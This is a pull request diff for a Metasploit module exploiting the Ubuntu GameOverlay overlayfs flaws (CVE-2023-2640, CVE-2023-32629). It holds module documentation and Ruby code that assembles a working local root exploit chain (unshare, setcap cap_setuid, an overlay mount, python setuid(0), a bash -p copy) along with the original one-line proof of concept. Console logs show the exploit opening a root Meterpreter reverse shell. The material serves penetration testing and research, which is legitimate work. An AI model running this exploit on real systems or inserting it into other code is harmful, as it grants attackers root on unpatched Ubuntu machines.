### PR TITLE
CVE-2023-2640, CVE-2023-32629 Game Overlay Ubuntu Privillege Escalation

### DIFF
--- a/documentation/modules/exploit/linux/local/gameoverlay_privesc.md
+++ b/documentation/modules/exploit/linux/local/gameoverlay_privesc.md
@@ -1,0 +1,148 @@
+## Description
+
+CVE-2023-2640 and CVE-2023-32629 are vunerabilites that allow for the arbitrary setting of 
+capabilities while overlaying filesystems. On most Linux Kernels during the execution of
+ `ovl_do_setxattr` an intermediate function `vfs_setxatrr` converts file capabilities in a
+way that limits them to the current namesapce. However, on some versions of the Ubuntu kernel
+ `_vfs_setxattr_noperm` is called directly without calling `vfs_setxattr`. 
+
+When a new namespace is created the user will technically be "root" within that given 
+namespace. This module will take advantage of this by setting the 	`CAP_SETUID` capability 
+on a system binary. It will then perform filesystem overlay, copying the binary into the lower
+directory. Because of the flaws described above when the binary is transfered into the upper
+directory it's capabilities will not be sanitized and persist in the "normal" namespace. 
+
+## Vunerable Application
+
+These vunerabilities are somewhat unique in that they effect a wide variety of Ubuntu releases
+and kernel versions, as described in the list below. 
+
+Ubuntu 23.04 (Lunar Lobster)m kernel 6.2.0, (CVE-2023-2640 & CVE-2023-32629)
+
+Ubuntu 22.10 (Kinetic Kudu), kernel -> 5.19.0, (CVE-2023-2640 & CVE-2023-32629)
+
+Ubuntu 22.04 LTS (Jammy Jellyfish), kernel -> 5.19.0, (CVE-2023-2640 & CVE-2023-32629)
+
+Ubuntu 22.04 LTS (Jammy Jellyfish), kernel -> 6.2.0, (CVE-2023-2640 & CVE-2023-32629)
+
+Ubuntu 20.04 LTS (Focal Fossa), kernel -> 5.4.0, (CVE-2023-32629)
+
+Ubuntu 18.04 LTS (Bionic Beaver), kernel -> 5.4.0, (CVE-2023-32629)
+
+The user can download a vunerable version, for example:
+
+```
+sudo apt update
+sudo apt install -y linux-image-5.19.0-41-generic linux-headers-5.19.0-41-generic
+reboot
+```
+While testing @bwatters7 mentioned taking the system Be sure to take the system offline to 
+prevent the vunerabilities from silently being patched. 
+
+This module has succesfully been tested on the following:
+
+Ubuntu 22.04 LTS (Jammy Jellyfish) 5.19.0-41-generic
+
+Ubuntu 20.04 LTS (Focal Fossa) 5.4.0-1018-aws
+
+## Verification Steps
+
+1). Start `msfconsole`
+
+2). Get a session on a vunerable system
+
+3). Use `exploit/linux/local/gameoverlay_privesc`
+
+4). Optional: choose target for payload, either system command (1) or payload (2) 
+`set target 1`
+
+5). Set session `set session [SESSION]`
+
+5). Do. `run`
+
+6). You should get a new session running as root. 
+
+## Options
+
+### Payload File Name
+Name of the file storing the payload, default is `marv`.
+
+### Writable Dir
+The name of a directory with write permissions, defualt is `/tmp`. This will be where the 
+payload file will be created. Additionally during the exploit a series of directories will be
+created here to perform the filesystem overlaying. 
+
+## Scenarios
+
+You have a non-root session on one of the systems described above. Please note that this 
+module will automatically run checks to determine if the system is vunerable, you can disable 
+this with `set AutoCheck False`. 
+
+```
+ > use exploit/linux/local/gameoverlay_privesc 
+[*] No payload configured, defaulting to linux/aarch64/meterpreter/reverse_tcp
+msf6 exploit(linux/local/gameoverlay_privesc) > set session 1
+session => 1
+msf6 exploit(linux/local/gameoverlay_privesc) > set target 0
+target => 0
+msf6 exploit(linux/local/gameoverlay_privesc) > set payload linux/aarch64/meterpreter_reverse_tcp
+payload => linux/aarch64/meterpreter_reverse_tcp
+msf6 exploit(linux/local/gameoverlay_privesc) > set lhost 10.5.135.201
+lhost => 10.5.135.201
+msf6 exploit(linux/local/gameoverlay_privesc) > show options
+
+Module options (exploit/linux/local/gameoverlay_privesc):
+
+   Name             Current Setting  Required  Description
+   ----             ---------------  --------  -----------
+   PayloadFileName  pVmtuGOGXdO      yes       Name of payload
+   SESSION          1                yes       The session to run this module on
+   WritableDir      /tmp             yes       A directory where we can write files
+
+
+Payload options (linux/aarch64/meterpreter_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux_Binary
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/local/gameoverlay_privesc) > run
+
+[*] Started reverse TCP handler on 10.5.135.201:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected Ubuntu version: Jammy Jellyfish
+[*] Detected kernel version: 5.19.0-41-generic
+[+] The target is vulnerable. Jammy Jellyfish with 5.19.0-41-generic kernel is vunerable
+[*] Creating directory /tmp/UqNFkc/
+[*] Creating directory /tmp/UqNFkc/QKZiqWWsnSOz/
+[*] Creating directory /tmp/UqNFkc/WbrucZxIAlWZF/
+[*] Creating directory /tmp/UqNFkc/uKmqunqY/
+[*] Creating directory /tmp/UqNFkc/pwFUmC/
+[*] Writing payload: /tmp/UqNFkc/pVmtuGOGXdO
+[*] Starting new namespace, and running exploit...
+[+] Deleted /tmp/UqNFkc/
+[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.149:49168) at 2024-10-02 16:28:43 -0500
+[*] 
+
+meterpreter > sysinfo
+Computer     : 10.5.132.149
+OS           : Ubuntu 22.04 (Linux 5.19.0-41-generic)
+Architecture : aarch64
+BuildTuple   : aarch64-linux-musl
+Meterpreter  : aarch64/linux
+meterpreter > getuid
+Server username: root
+meterpreter > 
+```

--- a/documentation/modules/exploit/linux/local/gameoverlay_privesc.md
+++ b/documentation/modules/exploit/linux/local/gameoverlay_privesc.md
@@ -1,20 +1,20 @@
 ## Description
 
-CVE-2023-2640 and CVE-2023-32629 are vunerabilites that allow for the arbitrary setting of 
+CVE-2023-2640 and CVE-2023-32629 are vulnerabilities that allow for the arbitrary setting of 
 capabilities while overlaying filesystems. On most Linux Kernels during the execution of
  `ovl_do_setxattr` an intermediate function `vfs_setxatrr` converts file capabilities in a
-way that limits them to the current namesapce. However, on some versions of the Ubuntu kernel
+way that limits them to the current namespace. However, on some versions of the Ubuntu kernel
  `_vfs_setxattr_noperm` is called directly without calling `vfs_setxattr`. 
 
 When a new namespace is created the user will technically be "root" within that given 
-namespace. This module will take advantage of this by setting the 	`CAP_SETUID` capability 
+namespace. This module will take advantage of this by setting the `CAP_SETUID` capability 
 on a system binary. It will then perform filesystem overlay, copying the binary into the lower
-directory. Because of the flaws described above when the binary is transfered into the upper
-directory it's capabilities will not be sanitized and persist in the "normal" namespace. 
+directory. Because of the flaws described above when the binary is transferred into the upper
+directory its capabilities will not be sanitized and persist in the "normal" namespace. 
 
 ## Vunerable Application
 
-These vunerabilities are somewhat unique in that they effect a wide variety of Ubuntu releases
+These vulnerabilities are somewhat unique in that they effect a wide variety of Ubuntu releases
 and kernel versions, as described in the list below. 
 
 Ubuntu 23.04 (Lunar Lobster)m kernel 6.2.0, (CVE-2023-2640 & CVE-2023-32629)
@@ -29,17 +29,17 @@ Ubuntu 20.04 LTS (Focal Fossa), kernel -> 5.4.0, (CVE-2023-32629)
 
 Ubuntu 18.04 LTS (Bionic Beaver), kernel -> 5.4.0, (CVE-2023-32629)
 
-The user can download a vunerable version, for example:
+The user can download a vulnerable version, for example:
 
 ```
 sudo apt update
 sudo apt install -y linux-image-5.19.0-41-generic linux-headers-5.19.0-41-generic
 reboot
 ```
-While testing @bwatters7 mentioned taking the system Be sure to take the system offline to 
-prevent the vunerabilities from silently being patched. 
+While testing, @bwatters7 mentioned taking the system offline as this appears to be patched automatically.
+Be sure to take the system offline to prevent the vulnerabilities from silently being patched. 
 
-This module has succesfully been tested on the following:
+This module has successfully been tested on the following:
 
 Ubuntu 22.04 LTS (Jammy Jellyfish) 5.19.0-41-generic
 
@@ -49,11 +49,11 @@ Ubuntu 20.04 LTS (Focal Fossa) 5.4.0-1018-aws
 
 1). Start `msfconsole`
 
-2). Get a session on a vunerable system
+2). Get a session on a vulnerable system
 
 3). Use `exploit/linux/local/gameoverlay_privesc`
 
-4). Optional: choose target for payload, either system command (1) or payload (2) 
+4). Optional: choose target for payload, either linux binary (0) or [li|u]nix command (1) 
 `set target 1`
 
 5). Set session `set session [SESSION]`
@@ -65,42 +65,38 @@ Ubuntu 20.04 LTS (Focal Fossa) 5.4.0-1018-aws
 ## Options
 
 ### Payload File Name
-Name of the file storing the payload, default is `marv`.
+Name of the file storing the payload, default is random.
 
 ### Writable Dir
-The name of a directory with write permissions, defualt is `/tmp`. This will be where the 
-payload file will be created. Additionally during the exploit a series of directories will be
+The name of a directory with write permissions, default is `/tmp`. This will be where the 
+payload file will be created if necessary. Additionally during the exploit a series of directories will be
 created here to perform the filesystem overlaying. 
 
 ## Scenarios
 
 You have a non-root session on one of the systems described above. Please note that this 
-module will automatically run checks to determine if the system is vunerable, you can disable 
+module will automatically run checks to determine if the system is vulnerable, you can disable 
 this with `set AutoCheck False`. 
 
 ```
- > use exploit/linux/local/gameoverlay_privesc 
-[*] No payload configured, defaulting to linux/aarch64/meterpreter/reverse_tcp
-msf6 exploit(linux/local/gameoverlay_privesc) > set session 1
-session => 1
-msf6 exploit(linux/local/gameoverlay_privesc) > set target 0
-target => 0
-msf6 exploit(linux/local/gameoverlay_privesc) > set payload linux/aarch64/meterpreter_reverse_tcp
-payload => linux/aarch64/meterpreter_reverse_tcp
-msf6 exploit(linux/local/gameoverlay_privesc) > set lhost 10.5.135.201
-lhost => 10.5.135.201
+msf6 exploit(linux/local/gameoverlay_privesc) >
+[*] Sending stage (3045380 bytes) to 10.5.132.129
+[*] Meterpreter session 3 opened (10.5.135.201:4585 -> 10.5.132.129:33504) at 2024-12-18 14:02:15 -0600
+
+msf6 exploit(linux/local/gameoverlay_privesc) > set session 3
+session => 3
 msf6 exploit(linux/local/gameoverlay_privesc) > show options
 
 Module options (exploit/linux/local/gameoverlay_privesc):
 
    Name             Current Setting  Required  Description
    ----             ---------------  --------  -----------
-   PayloadFileName  pVmtuGOGXdO      yes       Name of payload
-   SESSION          1                yes       The session to run this module on
+   PayloadFileName  pSueaCXrnzH      yes       Name of payload
+   SESSION          3                yes       The session to run this module on
    WritableDir      /tmp             yes       A directory where we can write files
 
 
-Payload options (linux/aarch64/meterpreter_reverse_tcp):
+Payload options (linux/x64/meterpreter/reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
@@ -120,29 +116,42 @@ View the full module info with the info, or info -d command.
 
 msf6 exploit(linux/local/gameoverlay_privesc) > run
 
-[*] Started reverse TCP handler on 10.5.135.201:4444 
+[*] Started reverse TCP handler on 10.5.135.201:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Detected Ubuntu version: Jammy Jellyfish
 [*] Detected kernel version: 5.19.0-41-generic
 [+] The target is vulnerable. Jammy Jellyfish with 5.19.0-41-generic kernel is vunerable
-[*] Creating directory /tmp/UqNFkc/
-[*] Creating directory /tmp/UqNFkc/QKZiqWWsnSOz/
-[*] Creating directory /tmp/UqNFkc/WbrucZxIAlWZF/
-[*] Creating directory /tmp/UqNFkc/uKmqunqY/
-[*] Creating directory /tmp/UqNFkc/pwFUmC/
-[*] Writing payload: /tmp/UqNFkc/pVmtuGOGXdO
-[*] Starting new namespace, and running exploit...
-[+] Deleted /tmp/UqNFkc/
-[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.149:49168) at 2024-10-02 16:28:43 -0500
-[*] 
+[*] Creating directory to store payload: /tmp/ODBpneOXk/
+[*] Creating directory /tmp/ODBpneOXk/
+[*] /tmp/ODBpneOXk/ created
+[*] Creating directory /tmp/ODBpneOXk/
+[*] Creating directory /tmp/ODBpneOXk/
+[*] /tmp/ODBpneOXk/ created
+[*] Creating directory /tmp/ODBpneOXk/bmbtPAX/
+[*] Creating directory /tmp/ODBpneOXk/bmbtPAX/
+[*] /tmp/ODBpneOXk/bmbtPAX/ created
+[*] Creating directory /tmp/ODBpneOXk/JtNbwLXJKw/
+[*] Creating directory /tmp/ODBpneOXk/JtNbwLXJKw/
+[*] /tmp/ODBpneOXk/JtNbwLXJKw/ created
+[*] Creating directory /tmp/ODBpneOXk/hEhbByWL/
+[*] Creating directory /tmp/ODBpneOXk/hEhbByWL/
+[*] /tmp/ODBpneOXk/hEhbByWL/ created
+[*] Creating directory /tmp/ODBpneOXk/yvvSFre/
+[*] Creating directory /tmp/ODBpneOXk/yvvSFre/
+[*] /tmp/ODBpneOXk/yvvSFre/ created
+[*] Writing payload: /tmp/ODBpneOXk/pSueaCXrnzH
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 10.5.132.129
+[*] rm: cannot remove '/tmp/ODBpneOXk/yvvSFre/': Device or resource busy
+[*] Meterpreter session 4 opened (10.5.135.201:4444 -> 10.5.132.129:44400) at 2024-12-18 14:02:42 -0600
 
-meterpreter > sysinfo
-Computer     : 10.5.132.149
-OS           : Ubuntu 22.04 (Linux 5.19.0-41-generic)
-Architecture : aarch64
-BuildTuple   : aarch64-linux-musl
-Meterpreter  : aarch64/linux
 meterpreter > getuid
 Server username: root
-meterpreter > 
+meterpreter > sysinfo
+Computer     : 10.5.132.129
+OS           : Ubuntu 22.04 (Linux 5.19.0-41-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+
 ```

--- a/modules/exploits/linux/local/gameoverlay_privesc.rb
+++ b/modules/exploits/linux/local/gameoverlay_privesc.rb
@@ -118,16 +118,27 @@ class MetasploitModule < Msf::Exploit::Local
 
   def exploit
     pay_file = datastore['PayloadFilename']
-
     pay_dir = datastore['WritableDir']
     pay_dir += "/" unless pay_dir.ends_with? "/"
     pay_dir += Rex::Text.rand_text_alpha 10
-
     pay_dir += "/" unless pay_dir.ends_with? "/"
     print_status "Creating directory to store payload: #{pay_dir}"
     mkdir pay_dir
-
-    directories = %w[l u w m].flat_map { |e| "#{pay_dir}#{e}" }
+    pay_dir = datastore['WritableDir']
+    pay_dir << '/' unless pay_dir.ends_with? '/'
+    pay_dir += Rex::Text.rand_text_alpha(rand(6..13))
+    pay_dir << '/'
+    directories = []
+    directories << pay_dir
+    lower_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/'
+    directories << lower_dir
+    upper_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/'
+    directories << upper_dir
+    work_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/'
+    directories << work_dir
+    merge_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/'
+    directories << merge_dir
+    bash_copy = '/var/tmp/bash'
 
     directories.each do |dir|
       print_status "Creating directory #{dir}"

--- a/modules/exploits/linux/local/gameoverlay_privesc.rb
+++ b/modules/exploits/linux/local/gameoverlay_privesc.rb
@@ -40,10 +40,29 @@ class MetasploitModule < Msf::Exploit::Local
           ['CVE', '2023-32629'],
           ['CVE', '2023-2640']
         ],
-        'Targets' => [ [ 'Linux', {} ] ],
-        'Arch' => [ ARCH_X86, ARCH_X64 ],
-        'DefaultOptions' => { 
-          'PrependSetuid' => true,
+        'Targets' => [
+          [
+            'Linux_Binary',
+            {
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'PrependSetuid' => true
+            }
+          ],
+          [
+            'Linux_Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Payload' =>
+                {
+                  'BadChars' => "\x93\x94"
+                }
+            }
+          ]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
         }
       )
     )

--- a/modules/exploits/linux/local/gameoverlay_privesc.rb
+++ b/modules/exploits/linux/local/gameoverlay_privesc.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Local
           'bwatters-r7', # MsF Module
           'gardnerapp', # MsF Module
         ],
-        'Platform' => ['linux'],
+        'Platform' => ['linux', 'unix'],
         'SessionTypes' => ['shell', 'meterpreter'],
         'DisclosureDate' => '2023-07-26',
         'References' => [
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Local
               'Arch' => ARCH_CMD,
               'Payload' =>
                 {
-                  'BadChars' => "\x93\x94"
+                  'BadChars' => "\x22\x27"
                 }
             }
           ]
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Local
     )
     register_options [
       OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']),
-      OptString.new('PayloadFileName', [true, 'Name of payload', 'marv']),
+      OptString.new('PayloadFileName', [true, 'Name of payload', Rex::Text.rand_text_alpha(rand(8..12))])
     ]
   end
 
@@ -150,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     if target.arch.first == ARCH_CMD
-      payload_cmd = "\\\"#{payload.encoded}\\\""
+      payload_cmd = payload.encoded
     else
       pay_file = datastore['PayloadFilename']
       payload_path = "#{pay_dir}#{pay_file}"
@@ -164,22 +164,24 @@ class MetasploitModule < Msf::Exploit::Local
 
     # Exploit overlayfs vuln
     # Build the command
+    rmrf_cmd = " rm -rf #{lower_dir} #{merge_dir} #{upper_dir} #{work_dir} #{bash_copy}"
 
     exploit_cmd = 'unshare -rm sh -c "'
     exploit_cmd << "cp #{cmd_exec('which python3')} #{lower_dir}; "
     exploit_cmd << "setcap cap_setuid+eip #{lower_dir}python3; "
     exploit_cmd << "mount -t overlay overlay -o rw,lowerdir=#{lower_dir},upperdir=#{upper_dir},workdir=#{work_dir} #{merge_dir} && "
-    exploit_cmd << "touch #{merge_dir}*; \" && "
+    exploit_cmd << "touch #{merge_dir}*; "
     exploit_cmd << "#{upper_dir}python3 -c 'import os;os.setuid(0);os.system("
-    exploit_cmd << "\"cp /bin/bash #{bash_copy} && chmod +x #{bash_copy} && "
-    exploit_cmd << "chmod +x #{payload_cmd} && " unless target.arch.first == ARCH_CMD
-    exploit_cmd << "#{bash_copy} -p -c "
-    exploit_cmd << payload_cmd
-    exploit_cmd << ' && ' unless target.arch.first == ARCH_CMD
-    exploit_cmd << " rm -rf #{lower_dir} #{merge_dir} #{upper_dir} #{work_dir} #{bash_copy}\")'"
-
+    exploit_cmd << "\\\"cp /bin/bash #{bash_copy} && chmod +x #{bash_copy} && "
+    if target.arch.first == ARCH_CMD
+      payload_cmd.gsub!('\\\\\\', '\\\\\\\\')
+      exploit_cmd << "#{bash_copy} -p -c \\\\\\\"(#{payload_cmd}); #{rmrf_cmd}\\\\\\\""
+    else
+      exploit_cmd << "chmod +x #{payload_cmd} && #{payload_cmd} & #{rmrf_cmd}"
+    end
+    exploit_cmd << "\\\")'\""
     output = cmd_exec(exploit_cmd)
-    print_status(output)
+    vprint_status(output)
   end
 
 end

--- a/modules/exploits/linux/local/gameoverlay_privesc.rb
+++ b/modules/exploits/linux/local/gameoverlay_privesc.rb
@@ -5,15 +5,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Linux::Kernel
   include Msf::Post::File
   include Msf::Exploit::FileDropper
-  include Msf::Exploit::CmdStager
-  include FileUtils
 
-  # TODO 
-  # 1) Add Msf::Post::Linux::System::get_sysinfo to get linux and kernel versions
-  # ^ What does the output change to 
-  #
-  # 4) Make exploit more readable with multiline string, change exploit to use 
-  # todo add python requirement
 
   def initialize(info = {})
     super(
@@ -50,12 +42,14 @@ class MetasploitModule < Msf::Exploit::Local
         ],
         'Targets' => [ [ 'Linux', {} ] ],
         'Arch' => [ ARCH_X86, ARCH_X64 ],
-        'CmdStagerFlavor' => 'bourne'
+        'DefaultOptions' => { 
+          'PrependSetuid' => true,
+        }
       )
     )
     register_options [
       OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']),
-      OptString.new('PayloadFileName', [true, 'Name of payloadf', 'marv'])
+      OptString.new('PayloadFileName', [true, 'Name of payload', 'marv']),
     ]
   end
 
@@ -103,61 +97,48 @@ class MetasploitModule < Msf::Exploit::Local
     return CheckCode::Safe("Target does not appear to be running a vunerable Ubuntu Distro or Kernel")
   end
 
-  def execute_command(_cmd, _opts = {})
+  def exploit
     pay_file = datastore['PayloadFilename']
 
     pay_dir = datastore['WritableDir']
     pay_dir += "/" unless pay_dir.ends_with? "/"
     pay_dir += Rex::Text.rand_text_alpha 10
 
-    directories = %w[l u w m].flat_map { |e| "#{pay_dir}#{e}" }
+    pay_dir += "/" unless pay_dir.ends_with? "/"
+    print_status "Creating directory to store payload: #{pay_dir}"
+    mkdir pay_dir
 
-    # Should we make sure directory doesn't already exist?
+    directories = %w[l u w m].flat_map { |e| "#{pay_dir}#{e}" }
 
     directories.each do |dir|
       print_status "Creating directory #{dir}"
-      mkdir dir
+      mkdir "#{dir}"
     end
-
-    register_dir_for_cleanup pay_dir
-
-    print_status "Creating directory to store payload: #{pay_dir}"
-    pay_dir.concat "/" unless pay_dir.ends_with? "/"
-    cmd_exec "mkdir -p #{pay_dir}"
-
-    register_dir_for_cleanup pay_dir
 
     pay = "#{pay_dir}#{pay_file}"
 
     print_status "Writing payload: #{pay}"
 
-    write_file "#{pay}", generate_payload_exe
-    # works move test to low, run unshare mount set cap, shell
+    write_file pay, generate_payload.generate
 
     print_status 'Starting new namespace, and running exploit...'
 
     # g1vi original
     # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'"
     
-    # TODO move running of payload and exploit to different cmd_exec calls
-    hack =  <<-TEXT
-    unshare -rm sh -c \"cp /u*/b*/p*3 #{pay_dir};
-        setcap cap_setuid+eip #{pay_dir}l/python3; 
-        mount -t overlay overlay -o rw,lowerdir=#{pay_dir}l,upperdir=#{pay_dir}u,workdir=#{pay_dir}w #{pay_dir}m 
-        && touch /tmp/main/m/* 
-      \" 
-     && #{pay_dir}/u/python3 -c 'import os;os.setuid(0); os.system(\"#{pay}\")'
-    TEXT
+    # Exploit overlayfs vuln
+    hack =  "unshare -rm sh -c \" cd #{pay_dir} && cp #{pay} l/; setcap cap_setuid+eip l/#{pay_file}; 
+    mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*\""
+    
 
-    print_status "Running exploit:\n '#{hack}'\n "
-    print_status(cmd_exec_with_result(hack))
-  end
+    print_status "Running exploit:\n'#{hack}'\n"
+    print_status(cmd_exec_with_result(hack).to_s)
 
-  def exploit
-    puts "System Info: #{get_sysinfo}"
-    execute_cmdstager
+    # Trigger payload
+    trigger = "cp #{pay_dir}u/#{pay_file} /home/ubuntu/test_payload; chmod +x #{pay_dir}u/#{pay_file} && #{pay_dir}u/#{pay_file}"
 
-    # System Info: {:kernel=>"Linux ip-172-26-8-97 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux", :distro=>"ubuntu", :version=>"Ubuntu 20.04.6 LTS"}
+    print_status "Triggering payload: #{trigger}"
+    print_status(cmd_exec_with_result(trigger).to_s)
   end
 
 end

--- a/modules/exploits/linux/local/gameoverlay_privesc.rb
+++ b/modules/exploits/linux/local/gameoverlay_privesc.rb
@@ -112,15 +112,15 @@ class MetasploitModule < Msf::Exploit::Local
       end
     end
 
-    return CheckCode::Safe("Target does not appear to be running a vunerable Ubuntu Distro or Kernel")
+    return CheckCode::Safe('Target does not appear to be running a vunerable Ubuntu Distro or Kernel')
   end
 
   def exploit
-    pay_file = datastore['PayloadFilename']
+    datastore['PayloadFilename']
     pay_dir = datastore['WritableDir']
-    pay_dir += "/" unless pay_dir.ends_with? "/"
+    pay_dir += '/' unless pay_dir.ends_with? '/'
     pay_dir += Rex::Text.rand_text_alpha 10
-    pay_dir += "/" unless pay_dir.ends_with? "/"
+    pay_dir += '/' unless pay_dir.ends_with? '/'
     print_status "Creating directory to store payload: #{pay_dir}"
     mkdir pay_dir
     pay_dir = datastore['WritableDir']
@@ -141,20 +141,22 @@ class MetasploitModule < Msf::Exploit::Local
 
     directories.each do |dir|
       print_status "Creating directory #{dir}"
-      mkdir "#{dir}"
+      mkdir dir.to_s
     end
 
-    pay = "#{pay_dir}#{pay_file}"
-
-    print_status "Writing payload: #{pay}"
-
-    write_file pay, generate_payload.generate
-
-    print_status 'Starting new namespace, and running exploit...'
+    if target.arch.first == ARCH_CMD
+      payload_cmd = "\\\"#{payload.encoded}\\\""
+    else
+      pay_file = datastore['PayloadFilename']
+      payload_path = "#{pay_dir}#{pay_file}"
+      print_status "Writing payload: #{payload_path}"
+      write_file(payload_path, generate_payload_exe)
+      payload_cmd = payload_path
+    end
 
     # g1vi original
     # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'"
-    
+
     # Exploit overlayfs vuln
     # Build the command
 

--- a/modules/exploits/linux/local/gameoverlay_privesc.rb
+++ b/modules/exploits/linux/local/gameoverlay_privesc.rb
@@ -178,8 +178,6 @@ class MetasploitModule < Msf::Exploit::Local
     exploit_cmd << ' && ' unless target.arch.first == ARCH_CMD
     exploit_cmd << " rm -rf #{lower_dir} #{merge_dir} #{upper_dir} #{work_dir} #{bash_copy}\")'"
 
-    vprint_status(exploit_cmd.to_s)
-
     output = cmd_exec(exploit_cmd)
     print_status(output)
   end

--- a/modules/exploits/linux/local/gameoverlay_privesc.rb
+++ b/modules/exploits/linux/local/gameoverlay_privesc.rb
@@ -5,6 +5,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Linux::Kernel
   include Msf::Post::File
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::EXE
 
   def initialize(info = {})
     super(
@@ -25,6 +26,7 @@ class MetasploitModule < Msf::Exploit::Local
         'Author' => [
           'g1vi', # PoC
           'h00die', # Module Suggestion
+          'bwatters-r7', # MsF Module
           'gardnerapp', # MsF Module
         ],
         'Platform' => ['linux'],
@@ -43,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Local
           [
             'Linux_Binary',
             {
-              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'Arch' => [ ARCH_AARCH64, ARCH_X64 ],
               'PrependSetuid' => true
             }
           ],
@@ -116,28 +118,31 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    datastore['PayloadFilename']
     pay_dir = datastore['WritableDir']
     pay_dir += '/' unless pay_dir.ends_with? '/'
-    pay_dir += Rex::Text.rand_text_alpha 10
-    pay_dir += '/' unless pay_dir.ends_with? '/'
+
+    pay_dir += Rex::Text.rand_text_alpha(rand(6..13)) + '/'
+
     print_status "Creating directory to store payload: #{pay_dir}"
     mkdir pay_dir
-    pay_dir = datastore['WritableDir']
-    pay_dir << '/' unless pay_dir.ends_with? '/'
-    pay_dir += Rex::Text.rand_text_alpha(rand(6..13))
-    pay_dir << '/'
+
     directories = []
     directories << pay_dir
+
     lower_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/'
     directories << lower_dir
+
     upper_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/'
     directories << upper_dir
+
     work_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/'
     directories << work_dir
+
     merge_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/'
     directories << merge_dir
-    bash_copy = '/var/tmp/bash'
+
+    bash_copy = '/var/tmp/' + Rex::Text.rand_text_alpha(rand(6..13))
+    # bash_copy = '/var/tmp/bash'
 
     directories.each do |dir|
       print_status "Creating directory #{dir}"

--- a/modules/exploits/linux/local/gameoverlay_privesc.rb
+++ b/modules/exploits/linux/local/gameoverlay_privesc.rb
@@ -140,7 +140,6 @@ class MetasploitModule < Msf::Exploit::Local
     # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'"
     
     # TODO move running of payload and exploit to different cmd_exec calls
-    # Swap vulns w code names, make sure regexes work agsain,s
     hack =  <<-TEXT
     unshare -rm sh -c \"cp /u*/b*/p*3 #{pay_dir};
         setcap cap_setuid+eip #{pay_dir}l/python3; 
@@ -151,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Local
     TEXT
 
     print_status "Running exploit:\n '#{hack}'\n "
-    print_status "Output of command: #{cmd_exec_with_result(hack)}"
+    print_status(cmd_exec_with_result(hack))
   end
 
   def exploit

--- a/modules/exploits/linux/local/gameoverlay_privesc.rb
+++ b/modules/exploits/linux/local/gameoverlay_privesc.rb
@@ -6,7 +6,6 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::File
   include Msf::Exploit::FileDropper
 
-
   def initialize(info = {})
     super(
       update_info(
@@ -157,18 +156,25 @@ class MetasploitModule < Msf::Exploit::Local
     # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'"
     
     # Exploit overlayfs vuln
